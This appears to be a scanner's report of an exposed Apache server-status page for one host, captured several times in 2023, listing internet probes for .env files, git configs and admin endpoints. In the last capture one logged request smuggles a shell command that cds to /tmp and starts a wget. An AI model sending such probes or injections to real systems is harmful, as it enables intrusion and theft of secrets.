0.14001280500.00.004.90 198.199.121.22http/1.1ravignon.mycloud.paris:80GET /.DS_Store HTTP/1.1 1-202897530/0/688_ 0.0001871414160.00.009.80 94.102.49.193http/1.1 2-202897540/1/226_ 0.0100448070.00.001.42 185.32.164.145http/1.1localhost:80GET /backend/.env HTTP/1.1 2-202897540/1/222_ 0.07084436380.00.001.56 207.154.240.169http/1.1ravignon.mycloud.paris:443GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 2-202897540/1/230_ 0.0100496480.00.004.44 198
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31933c4805933c480569235a0d
Apache Status Apache Server Status for ravignon.mycloud.paris (via 192.168.145.253) Server Version: Apache/2.4.52 (Ubuntu) OpenSSL/3.0.2 Server MPM: event Server Built: 2023-03-08T17:32:01 Current Time: Saturday, 24-Jun-2023 23:43:12 UTC Restart Time: Saturday, 11-Mar-2023 06:16:37 UTC Parent Server Config. Generation: 118 Parent Server MPM Generation: 117 Server uptime: 105 days 17 hours 26 minutes 35 seconds Server load: 0.19 0.04 0.01 Total accesses: 174105 - Total Traffic: 2.1 GB - Total Duration: 34904681 CPU Usage: u250.74 s457.81 cu1019.11 cs308.6 - .0223% CPU load .0191 requests/sec - 248 B/second - 12.7 kB/request - 200.481 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 12242180no0yes124000 22242181no0yes025000 Sum200 149000 ........................._W_____________________________________ ___________..................................................... ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-111-0/0/1677. 0.0025818802640490.00.0033.77 107.170.239.30http/1.1 0-111-0/0/1726. 0.0025818802792020.00.0028.11 83.97.73.89http/1.1localhost:80GET /geoserver HTTP/1.1 0-111-0/0/1705. 0.0025818802621500.00.0014.83 54.37.79.75http/1.1 0-111-0/0/1751. 0.00258188177743110.00.0024.48 45.128.232.62http/1.1localhost:80GET / HTTP/1.1 0-111-0/0/1678. 0.00258188932484440.00.0029.09 200.114.79.3http/1.1ravignon.mycloud.paris:443GET / HTTP/1.0 0-111-0/0/1747. 0.0025818802497780.00.0021.22 54.37.79.75http/1.1 0-111-0/0/1779. 0.0025818802677490.00.0029.38 141.98.10.75http/1.1ravignon.mycloud.paris:443GET / HTTP/1.0 0-111-0/0/1705. 0.0025818812513340.00.0027.09 200.114.79.3http/1.1 0-111-0/0/1656. 0.0025818802508210.00.0018.54 54.37.79.75http/1.1localhost:80GET /.env HTTP/1.1 0-111-0/0/1695. 0.002581881092393220.00.0019.03 54.37.79.75http/1.1 0-111-0/0/1690. 0.00258188110812714470.00.0013.32 120.6.224.48http/1.1localhost:80POST /HNAP1/ HTTP/1.0 0-111-0/0/1708. 0.00258188113243275820.00.0017.22 92.184.100.172h2ravignon.mycloud.paris:443GET /ocs/v2.php/search/providers/files/search?term=pb2018 HTTP/ 0-111-0/0/1732. 0.0025818802707360.00.0025.89 107.170.239.30http/1.1 0-111-0/0/1638. 0.002581881692622500.00.0014.18 54.37.79.75http/1.1 0-111-0/0/1683. 0.002581882182495520.00.0015.82 54.37.79.75http/1.1 0-111-0/0/1698. 0.00258188892695950.00.0017.35 104.248.143.84http/1.1ravignon.mycloud.paris:443GET / HTTP/1.1 0-111-0/0/1745. 0.0025818802736090.00.0015.85 83.97.73.89http/1.1localhost:80GET /actuator/gateway/routes HTTP/1.1 0-111-0/0/1659. 0.0025818802455370.00.0014.72 179.43.177.244http/1.1localhost:80GET / HTTP/1.1 0-111-0/0/1695. 0.0025818802600500.00.0012.20 107.170.239.30http/1.1 0-111-0/0/1731. 0.0025818812682840.00.0026.41 54.37.79.75http/1.1localhost:80POST / HTTP/1.1 0-111-0/0/1686. 0.00258188842293010.00.0020.23 13.81.117.122http/1.1ravignon.mycloud.paris:443GET / HTTP/1.1 0-111-0/0/1684. 0.002581881752583060.00.0020.30 184.105.247.195http/1.1ravignon.mycloud.paris:443POST /services/discovery HTTP/1.1 0-111-0/0/1756. 0.0025818812553890.00.0011.64 107.170.239.30h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-111-0/0/1670. 0.002581882132466210.00.0023.17 34.77.127.183http/1.1ravignon.mycloud.paris:443GET / HTTP/1.1 0-111-0/0/1674. 0.0025818802438140.00.0012.97 107.170.239.30h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-11722421800/0/2163_ 0.00003289490.00.0019.76 172.105.37.32http/1.1 1-11722421801/2/2190W 0.12003311640.00.0125.22 172.105.37.32http/1.1ravignon.mycloud.paris:443GET /server-status HTTP/1.1 1-11722421800/3/2195_ 0.12303466720.00.0231.93 137.184.150.232http/1.1ravignon.mycloud.paris:80GET /?rest_route=/wp/v2/users/ HTTP/1.1 1-11722421800/1/2143_ 0.10303294620.00.0027.90 137.184.150.232http/1.1ravignon.mycloud.paris:80GET / HTTP/1.1 1-11722421800/1/2234_ 0.00303487690.00.0022.63 172.105.37.32http/1.1 1-11722421800/2/2156_ 0.132683475430.00.0118.25 172.105.37.32http/1.1ravignon.mycloud.paris:443GET / HTTP/1.1 1-11722421800/1/2186_ 0.10203262800.00.0028.88 137.184.150.232http/1.1ravignon.mycloud.paris:80GET /.vscode/sftp.json HTTP/1.1 1-11722421800/1/2252_ 0.0321013611340.00.0219.29 172.105.37.32h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-11722421800/2/2257_ 0.132583369580.00.0122.49 172.105.37.32http/1.1ravignon.mycloud.paris:443GET /.vscode/sftp.json HTTP/1.1 1-11722421800/0/2182_ 0.00243264970.00.0029.20 88.169.41.170http/1.1localhost:80done, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 1-11722421800/1/2153_ 0.10203421730.00.0029.00 137.184.150.232http/1.1ravignon.mycloud.paris:80GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 1-11722421800/1/2205_ 0.071943472260.00.0120.62 154.28.229.66http/1.1ravignon.mycloud.paris:443GET /index.php/apps/theming/manifest?v=1 HTTP/1.1 1-11722421800/2/2226_ 0.1611703603050.00.0621.01 91.213.50.8http/1.1ravignon.mycloud.paris:443GET /.git/config HTTP/1.1 1-11722421800/2/2184_ 0.10203369190.00.0118.18 137.184.150.232http/1.1ravignon.mycloud.paris:80GET /login.action HTTP/1.1 1-11722421800/2/2240_ 0.1611763535350.00.0437.02 172.105.37.32http/1.1ravignon.mycloud.paris:443GET /debug/default/view?panel=config HTTP/1.1 1-11722421800/1/2279_ 0.06103917780.00.0123.00 172.105.37.32http/1.1 1-11722421800/2/2190_ 0.11103581340.00.0139.20 137.184.150.232http/1.1ravignon.mycloud.paris:80GET /_all_dbs HTTP/1.1 1-11722421800/3/2218_ 0.142593735050.00.0136.16 172.105.37.32http/1.1ravignon.mycloud.paris:443GET /about HTTP/1.1 1-11722421800/2/2182_ 0.11103078010.00.0322.99 137.184.150.232http/1.1ravignon.mycloud.paris:80GET /.DS_Store HTTP/1.1 1-11722421800/1/2081_ 0.11103356310.00.0019.18 137.184.150.232http/1.1ravignon.mycloud.paris:80GET /.env HTTP/1.1 1-11722421800/1/2230_ 0.1701293325960.00.0029.40 172.105.37.32http/1.1ravignon.mycloud.paris:443GET /v2/_catalog HTTP/1.1 1-11722421800/1/2200_ 0.11103513850.00.0028.33 137.184.150.232http/1.1ravignon.mycloud.paris:80GET /.git/config HTTP/1.1 1-11722421800/1/2184_ 0.12103211570.00.0021.16 137.184.150.232http/1.1ravignon.mycloud.paris:80GET /s/2393e2937313e2039313e2930313/_/;/META-INF/maven/com.atla 1-11722421800/0/2103_ 0.000993281830.00.0037.41 172.105.37.32h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-11722421800/1/2170_ 0.12003412530.00.0022.62 137.184.150.232http/1.1ravignon.mycloud.paris:80GET /config.json HTTP/1.1 2-11722421810/1/1984_ 0.014863242880.00.01
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31933c4805933c48056844d098
Apache Status Apache Server Status for ravignon.mycloud.paris (via 192.168.145.253) Server Version: Apache/2.4.52 (Ubuntu) OpenSSL/3.0.2 Server MPM: event Server Built: 2023-03-08T17:32:01 Current Time: Saturday, 01-Apr-2023 00:05:18 UTC Restart Time: Saturday, 11-Mar-2023 06:16:37 UTC Parent Server Config. Generation: 24 Parent Server MPM Generation: 23 Server uptime: 20 days 17 hours 48 minutes 41 seconds Server load: 0.00 0.00 0.00 Total accesses: 39906 - Total Traffic: 466.2 MB - Total Duration: 6921548 CPU Usage: u53.74 s101.09 cu261.65 cs80.71 - .0277% CPU load .0223 requests/sec - 272 B/second - 12.0 kB/request - 173.446 ms/request 12 requests currently being processed, 38 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 1912199no0yes421000 2912197no0yes817000 Sum200 1238000 ........................._R_____R_____WR_____________________W__ W_W_RR_RRR_..................................................... ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-19-0/0/290. 0.0086716196476270.00.001.94 44.200.195.68http/1.1 0-19-0/0/318. 0.00867163495790.00.001.99 44.200.195.68http/1.1 0-19-0/0/296. 0.00867160493550.00.002.16 139.59.56.36http/1.1 0-19-0/0/309. 0.0086716109477650.00.001.86 67.246.172.189http/1.1 0-19-0/0/320. 0.00867160581310.00.002.21 44.200.195.68http/1.1 0-19-0/0/327. 0.0086716104484450.00.004.83 44.200.195.68http/1.1 0-19-0/0/321. 0.00867160444360.00.002.33 139.59.56.36http/1.1 0-19-0/0/311. 0.00867161464020.00.002.93 139.59.56.36http/1.1 0-19-0/0/294. 0.0086716174468700.00.005.06 44.200.195.68http/1.1 0-19-0/0/317. 0.00867162457000.00.001.81 44.200.195.68http/1.1 0-19-0/0/295. 0.008671675492230.00.001.61 139.59.56.36http/1.1localhost:80\x16\x03\x01 0-19-0/0/319. 0.0086716147538680.00.001.88 44.200.195.68http/1.1 0-19-0/0/300. 0.00867160542260.00.0015.19 44.200.195.68http/1.1 0-19-0/0/318. 0.0086716137483240.00.001.89 44.200.195.68http/1.1 0-19-0/0/291. 0.00867163441200.00.001.88 139.59.56.36http/1.1localhost:80GET / HTTP/1.1 0-19-0/0/315. 0.00867164478640.00.003.70 67.246.172.189http/1.1localhost:80GET / HTTP/1.1 0-19-0/0/337. 0.00867160610960.00.001.93 139.59.56.36http/1.1localhost:80GET /favicon.ico HTTP/1.1 0-19-0/0/300. 0.008671682455420.00.002.25 223.87.122.28http/1.1ravignon.mycloud.paris:443GET / HTTP/1.0 0-19-0/0/325. 0.00867163503280.00.002.29 44.200.195.68http/1.1 0-19-0/0/303. 0.008671694540950.00.001.74 44.200.195.68http/1.1 0-19-0/0/311. 0.00867160452650.00.001.93 139.59.56.36http/1.1localhost:80GET /geoip/ HTTP/1.1 0-19-0/0/310. 0.00867160519860.00.002.87 44.200.195.68http/1.1 0-19-0/0/317. 0.00867161495440.00.001.90 44.200.195.68http/1.1 0-19-0/0/301. 0.00867160464890.00.002.00 44.200.195.68http/1.1 0-19-0/0/311. 0.0086716105426830.00.002.69 44.200.195.68http/1.1 1-239121990/1/443_ 0.0510739830.00.002.80 142.93.153.3http/1.1ravignon.mycloud.paris:80GET /server-status HTTP/1.1 1-239121990/0/485R 0.001152791550.00.003.14 159.203.63.67http/1.1ravignon.mycloud.paris:443 1-239121990/1/476_ 0.0510841100.00.003.32 142.93.153.3http/1.1ravignon.mycloud.paris:80GET /?rest_route=/wp/v2/users/ HTTP/1.1 1-239121990/0/473_ 0.001126813890.00.003.16 185.11.61.195http/1.1 1-239121990/2/471_ 0.0510896380.00.005.87 142.93.153.3http/1.1ravignon.mycloud.paris:80GET /.vscode/sftp.json HTTP/1.1 1-239121990/2/442_ 0.0410713990.00.002.96 142.93.153.3http/1.1localhost:80HELP 1-239121990/0/472_ 0.0010763370.00.003.23 159.203.63.67h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-239121991/0/495W 0.0000941900.00.003.76 159.203.63.67http/1.1ravignon.mycloud.paris:443GET /telescope/requests HTTP/1.1 1-239121990/1/466_ 0.0510766080.00.003.18 142.93.153.3http/1.1ravignon.mycloud.paris:80GET / HTTP/1.1 1-239121990/0/450_ 0.0022138772750.00.003.35 172.104.137.47http/1.1 1-239121990/1/481_ 0.0510882120.00.003.29 142.93.153.3http/1.1ravignon.mycloud.paris:80GET /.DS_Store HTTP/1.1 1-239121990/1/461_ 0.0610814120.00.002.93 142.93.153.3http/1.1ravignon.mycloud.paris:80GET /info.php HTTP/1.1 1-239121990/1/456_ 0.0510833870.00.003.20 142.93.153.3http/1.1ravignon.mycloud.paris:80GET /.git/config HTTP/1.1 1-239121991/1/460W 0.0100812720.00.005.40 159.203.63.67http/1.1ravignon.mycloud.paris:443GET /.DS_Store HTTP/1.1 1-239121990/0/461R 0.0022140928060.00.006.49 159.203.63.67http/1.1ravignon.mycloud.paris:443 1-239121990/0/480_ 0.0000828030.00.003.20 159.203.63.67http/1.1 1-239121990/0/434_ 0.000125817370.00.003.12 159.203.63.67h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-239121990/0/481_ 0.0011421063700.00.003.14 159.203.63.67http/1.1 1-239121990/1/467_ 0.0610823070.00.005.26 142.93.153.3http/1.1ravignon.mycloud.paris:80GET /telescope/requests HTTP/1.1 1-239121990/0/453_ 0.0010823480.00.002.94 172.104.137.47http/1.1 1-239121990/0/440_ 0.001251724610.00.003.82 172.104.137.47http/1.1 1-239121990/0/458_ 0.001129802860.00.003.90 172.104.137.47http/1.1 1-239121990/1/442_ 0.0610802070.00.003.15 142.93.153.3http/1.1ravignon.mycloud.paris:80GET /api/search?folderIds=0 HTTP/1.1 1-239121990/0/456_ 0.0010829950.00.009.95 159.203.63.67http/1.1 1-239121990/0/437_ 0.00176675540.00.002.81 45.33.80.243http/1.1 2-239121970/2/727_ 0.0121271301350.00.015.22 159.203.63.67http/1.1ravignon.mycloud.paris:443HELP 2-239121970/0/693_ 0.0022391167860.00.005.29 172.104.137.47http/1.1 2-239121970/1/744_ 0.01101365310.00.004.48 142.93.153.3http/1.1ravignon.mycloud.paris:80GET /.env HTTP/1.1 2-239121970/1/757_ 0.01101190670.00.0011.12 142.93.153.3http/1.1ravignon.mycloud.paris:80GET /debug/default/view?panel=config HTTP/1.1 2-239121970/1/725_ 0.01101168410.00.0010.99 142.93.153.3http/1.1ravignon.mycloud.paris:80GET /s/2393e2937313e2039313e2
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31933c4805933c480515aead72
Apache Status Apache Server Status for ravignon.mycloud.paris (via 192.168.145.253) Server Version: Apache/2.4.52 (Ubuntu) OpenSSL/3.0.2 Server MPM: event Server Built: 2023-01-23T18:34:42 Current Time: Friday, 24-Feb-2023 23:58:51 UTC Restart Time: Friday, 10-Feb-2023 17:57:46 UTC Parent Server Config. Generation: 18 Parent Server MPM Generation: 17 Server uptime: 14 days 6 hours 1 minute 5 seconds Server load: 0.00 0.00 0.00 Total accesses: 14156 - Total Traffic: 110.3 MB - Total Duration: 2891499 CPU Usage: u38.18 s77.21 cu97.13 cs28.88 - .0196% CPU load .0115 requests/sec - 93 B/second - 8.0 kB/request - 204.26 ms/request 13 requests currently being processed, 37 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 0223434no0yes223000 1223435no0yes1114000 Sum200 1337000 ___________________WW__________W____WWWWWWWWWW____.............. ................................................................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-172234340/0/292_ 0.00110590380.00.001.62 65.49.20.66http/1.1 0-172234340/1/301_ 0.0211247632710.00.021.71 51.81.167.146h2ravignon.mycloud.paris:443idle, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 0-172234340/0/317_ 0.00110625950.00.001.87 190.211.252.122http/1.1done, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 0-172234340/1/311_ 0.02779973280.00.001.76 51.75.169.50h2ravignon.mycloud.paris:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-172234340/0/292_ 0.0071526380.00.001.62 152.89.196.211http/1.1localhost:80GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1 0-172234340/0/312_ 0.0070667420.00.001.63 190.211.252.122http/1.1done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-172234340/1/306_ 0.0320643870.00.002.12 139.144.150.205http/1.1localhost:80\x16\x03\x01\x01\t\x01 0-172234340/0/309_ 0.0020615920.00.001.98 185.246.220.98http/1.1 0-172234340/2/307_ 0.0320593590.00.001.89 139.144.150.205http/1.1localhost:80HELP 0-172234340/0/297_ 0.002198415570.00.001.81 65.49.20.66http/1.1ravignon.mycloud.paris:443GET / HTTP/1.1 0-172234340/1/301_ 0.0111115898840.00.001.91 51.81.167.146h2ravignon.mycloud.paris:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-172234340/1/304_ 0.0420624280.00.002.23 139.144.150.205http/1.1ravignon.mycloud.paris:80GET /.env HTTP/1.1 0-172234340/0/332_ 0.0023687700.00.002.22 139.144.150.45h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-172234340/0/304_ 0.0010661140.00.001.74 139.144.150.45h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-172234340/0/294_ 0.0010681070.00.001.79 139.144.150.45http/1.1 0-172234340/0/288_ 0.0010576310.00.001.68 139.144.150.45http/1.1 0-172234340/0/288_ 0.0000501710.00.001.65 139.144.150.45h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-172234340/0/301_ 0.0000567280.00.001.73 139.144.150.45http/1.1 0-172234340/0/323_ 0.0000597300.00.001.98 139.144.150.45http/1.1 0-172234341/0/339W 0.0000834750.00.002.39 139.144.150.45http/1.1ravignon.mycloud.paris:443GET /?rest_route=/wp/v2/users/ HTTP/1.1 0-172234341/0/317W 0.0000533030.00.001.81 54.208.220.59http/1.1ravignon.mycloud.paris:443GET /.git/config HTTP/1.1 0-172234340/0/322_ 0.00310547090.00.002.01 143.244.50.172http/1.1ravignon.mycloud.paris:443GET / HTTP/1.0 0-172234340/0/311_ 0.00310681940.00.001.74 109.194.141.131http/1.1 0-172234340/0/294_ 0.00310679400.00.002.59 64.225.60.187http/1.1 0-172234340/0/320_ 0.0031109713040.00.001.79 51.254.49.101http/1.1ravignon.mycloud.paris:443GET / HTTP/1.1 1-172234350/1/279_ 0.022141467300.00.011.64 15.204.173.67http/1.1ravignon.mycloud.paris:443GET / HTTP/1.1 1-172234350/1/259_ 0.022133474760.00.015.31 15.204.173.67http/1.1ravignon.mycloud.paris:443GET /index.php/login HTTP/1.1 1-172234350/2/278_ 0.032107543670.00.011.54 139.144.150.45http/1.1ravignon.mycloud.paris:443HELP 1-172234350/1/247_ 0.0220377090.00.001.41 51.81.167.146http/1.1ravignon.mycloud.paris:80GET / HTTP/1.1 1-172234350/1/275_ 0.081200650730.00.001.56 51.75.169.50h2ravignon.mycloud.paris:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-172234350/1/261_ 0.0210598260.00.001.58 139.144.150.45h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-172234351/1/237W 0.0300923480.00.0016.28 139.144.150.45http/1.1ravignon.mycloud.paris:443GET /info.php HTTP/1.1 1-172234350/1/250_ 0.0210576610.00.001.94 139.144.150.205http/1.1ravignon.mycloud.paris:80GET /s/2393e2937313e2039313e2930313/_/;/META-INF/maven/com.atla 1-172234350/1/244_ 0.0200434010.00.001.47 139.144.150.205http/1.1ravignon.mycloud.paris:80done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-172234350/1/261_ 0.0200557270.00.001.63 139.144.150.45h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-172234350/1/252_ 0.0210369190.00.001.44 139.144.150.45http/1.1 1-172234351/1/275W 0.0300501470.00.001.85 139.144.150.45http/1.1ravignon.mycloud.paris:443GET /s/2393e2937313e2039313e2930313/_/;/META-INF/maven/com.atla 1-172234351/1/226W 0.0300454830.00.001.28 139.144.150.45http/1.1ravignon.mycloud.paris:443GET /.vscode/sftp.json HTTP/1.1 1-172234351/1/281W 0.0300589870.00.001.80 139.144.150.45http/1.1ravignon.mycloud.paris:443GET /debug/default/view?panel=config HTTP/1.1 1-172234351/1/244W 0.0300540580.00.002.89 139.144.150.45http/1.1ravignon.mycloud.paris:443GET / HTTP/1.1 1-172234351/1/276W 0.0300565070.00.001.62 139.144.150.45http/1.1ravignon.mycloud.paris:443GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 1-172234351/0/236W 0.0000395190.00.001.58 139.144.150.45http/1.1ravignon.mycloud.paris:443GET /telescope/requests HTTP/1.1 1-172234351/0/246W 0.0000552410.00.001.52 139.144.150.45http/1.1ravignon.mycloud.paris:443GET /server-status HTTP/1.1 1-172234351/0/276W 0.0000488630.00.004.61 139.144.150.45http/1.1ravignon.mycloud.paris:443GET /.DS_Store HTTP/1.1 1-172234351/0/256W 0.0000582210.00.001.54 139.144.150.45http/1.1ravignon.mycloud.paris:443GET /.env HTTP/1.1 1-172234351/5/281W 0.0300429560.00.001.57 139.144.150.45http/1.1ravignon.mycloud.paris:443GET /.git/config HTTP/1.1 1-172234350/0/251_ 0.0031293543850.00.002.17 178.32.197.94http/1.1ravignon.mycloud.paris:443GET / HTTP/1.1 1-172234350/0/274_ 0.00312441420.00.001.57 193.32.162.159http/1.1localhost:80GET / HTTP/1.1 1-172234350/0/263_ 0.00310465980.00.001.60 94.102.61.7http/1.1 1-172234350/0/246_ 0.0031109321360.00.001.58 109.237.97.180http/1.1ravignon.mycloud.paris:443GET / HTTP/1.0 SrvChild Server number - generation<
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31933c4805933c4805a7775ed8
Apache Status Apache Server Status for ravignon.mycloud.paris (via 192.168.145.253) Server Version: Apache/2.4.52 (Ubuntu) OpenSSL/3.0.2 Server MPM: event Server Built: 2022-06-14T12:30:21 Current Time: Wednesday, 01-Feb-2023 00:09:09 UTC Restart Time: Friday, 27-Jan-2023 19:21:38 UTC Parent Server Config. Generation: 8 Parent Server MPM Generation: 7 Server uptime: 4 days 4 hours 47 minutes 31 seconds Server load: 0.09 0.02 0.00 Total accesses: 6850 - Total Traffic: 258.2 MB - Total Duration: 1206201 CPU Usage: u11.4 s21.47 cu53.98 cs17.45 - .0287% CPU load .0189 requests/sec - 746 B/second - 38.6 kB/request - 176.088 ms/request 12 requests currently being processed, 38 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 064732no0yes619000 164733no0yes619000 Sum200 1238000 __RWWW__R___R__________________________RWWRWR_____.............. ................................................................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-7647320/1/191_ 0.010124259260.00.014.79 139.59.138.104http/1.1 0-7647320/0/170_ 0.0000329750.00.001.01 139.59.138.104http/1.1 0-7647320/1/174R 0.0115328360.00.002.08 139.59.138.104http/1.1 0-7647321/0/166W 0.0000235450.00.002.34 139.59.138.104http/1.1ravignon.mycloud.paris:443GET /.vscode/sftp.json HTTP/1.1 0-7647321/2/172W 0.0100300780.00.006.13 139.59.138.104http/1.1ravignon.mycloud.paris:443GET / HTTP/1.1 0-7647321/0/161W 0.0000367580.00.001.89 139.59.138.104http/1.1ravignon.mycloud.paris:443GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 0-7647320/2/181_ 0.031125340090.00.0114.50 139.59.138.104http/1.1ravignon.mycloud.paris:443HELP 0-7647320/1/164_ 0.0211313580.00.001.15 139.162.214.192http/1.1ravignon.mycloud.paris:80GET /.vscode/sftp.json HTTP/1.1 0-7647320/1/170R 0.0210353200.00.002.99 139.59.138.104http/1.1ravignon.mycloud.paris:443 0-7647320/1/167_ 0.0210255560.00.001.51 139.162.214.192http/1.1ravignon.mycloud.paris:80GET /.env HTTP/1.1 0-7647320/1/166_ 0.0210393990.00.0032.36 139.162.214.192http/1.1ravignon.mycloud.paris:80GET /.DS_Store HTTP/1.1 0-7647320/1/157_ 0.0211255260.00.001.86 139.162.214.192http/1.1ravignon.mycloud.paris:80GET /server-status HTTP/1.1 0-7647320/1/155R 0.0211274650.00.001.88 139.59.138.104http/1.1 0-7647320/1/159_ 0.0210267080.00.005.69 139.162.214.192http/1.1ravignon.mycloud.paris:80GET /telescope/requests HTTP/1.1 0-7647320/1/161_ 0.0210271930.00.000.85 139.162.214.192http/1.1ravignon.mycloud.paris:80GET / HTTP/1.1 0-7647320/1/177_ 0.0210284280.00.001.96 139.162.214.192http/1.1ravignon.mycloud.paris:80GET /debug/default/view?panel=config HTTP/1.1 0-7647320/0/157_ 0.0010267410.00.002.87 152.89.196.211http/1.1localhost:80GET /actuator/gateway/routes HTTP/1.1 0-7647320/0/160_ 0.0011324540.00.002.22 143.244.130.35http/1.1 0-7647320/0/162_ 0.000476287810.00.002.76 139.59.138.104h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-7647320/0/166_ 0.00188297310.00.003.61 109.237.98.226http/1.1ravignon.mycloud.paris:443GET /.env HTTP/1.1 0-7647320/0/162_ 0.0011245720.00.003.62 104.244.74.198http/1.1ravignon.mycloud.paris:443GET / HTTP/1.0 0-7647320/0/159_ 0.00092213320.00.001.95 139.59.138.104h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-7647320/0/149_ 0.0001221470.00.004.98 139.59.138.104h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-7647320/0/149_ 0.000203251900.00.0019.79 139.59.138.104http/1.1 0-7647320/0/153_ 0.0000237090.00.000.81 139.59.138.104h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-7647330/2/113_ 0.0110189680.00.000.65 139.162.214.192http/1.1ravignon.mycloud.paris:80GET /s/2393e2937313e2039313e2930313/_/;/META-INF/maven/com.atla 1-7647330/0/121_ 0.0010698181150.00.002.46 164.90.139.238http/1.1 1-7647330/0/104_ 0.0010136410.00.000.64 195.133.40.83http/1.1localhost:80GET /cgi-bin/masterCGI?ping=nomip&user=;cd${IFS}/tmp;wget${IFS} 1-7647330/2/108_ 0.0110175870.00.000.86 139.162.214.192http/1.1ravignon.mycloud.paris:80GET /api/search?folderIds=0 HTTP/1.1 1-7647330/2/125_ 0.0110244330.00.003.75 139.162.214.192http/1.1ravignon.mycloud.paris:80GET /config.json HTTP/1.1 1-7647330/0/94_ 0.00106147140540.00.001.29 54.165.166.246http/1.1 1-7647330/1/110_ 0.0110165640.00.000.89 139.162.214.192http/1.1ravignon.mycloud.paris:80GET /info.php HTTP/1.1 1-7647330/0/89_ 0.001060137770.00.000.52 81.161.229.94http/1.1localhost:80GET /config/getuser?index=0 HTTP/1.1 1-7647330/1/112_ 0.0110178140.00.000.75 139.162.214.192http/1.1ravignon.mycloud.paris:80GET /v2/_catalog HTTP/1.1 1-7647330/0/121_ 0.0010196040.00.000.77 54.165.166.246http/1.1 1-7647330/0/113_ 0.001144192360.00.0013.84 54.165.166.246http/1.1 1-7647330/0/109_ 0.001154204260.00.001.39 139.59.138.104h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-7647330/0/109_ 0.0001018226670.00.003.90 139.59.138.104http/1.1 1-7647330/0/111_ 0.000127250970.00.0075.77 139.59.138.104http/1.1 1-7647330/0/108R 0.001060167220.00.001.73 139.59.138.104http/1.1 1-7647331/0/120W 0.0000179800.00.000.81 139.59.138.104http/1.1ravignon.mycloud.paris:443GET /server-status HTTP/1.1 1-7647331/0/101W 0.0000191130.00.0011.24 139.59.138.104http/1.1ravignon.mycloud.paris:443GET /.git/config HTTP/1.1 1-7647330/0/114R 0.00106195262250.00.001.73 139.59.138.104http/1.1 1-7647331/0/110W 0.0000236230.00.002.00 139.59.138.104http/1.1ravignon.mycloud.paris:443GET /?rest_route=/wp/v2/users/ HTTP/1.1 1-7647330/0/96R 0.00106131171870.00.000.55 139.59.138.104http/1.1 1-7647330/0/109_ 0.001060206380.00.000.65 167.248.133.120http/1.1localhost:80GET /favicon.ico HTTP/1.1 1-7647330/0/117_ 0.0010696226620.00.000.80 220.178.65.134http/1.1ravignon.mycloud.paris:443GET / HTTP/1.0 1-7647330/0/113_ 0.001061210670.00.001.76 195.133.40.83http/1.1localhost:80GET / HTTP/1.1 1-7647330/0/104_ 0.001062192500.00.003.18 164.90.139.238h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-7647330/0/111_ 0.00106146219880.00.000.70 164.90.139.238h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 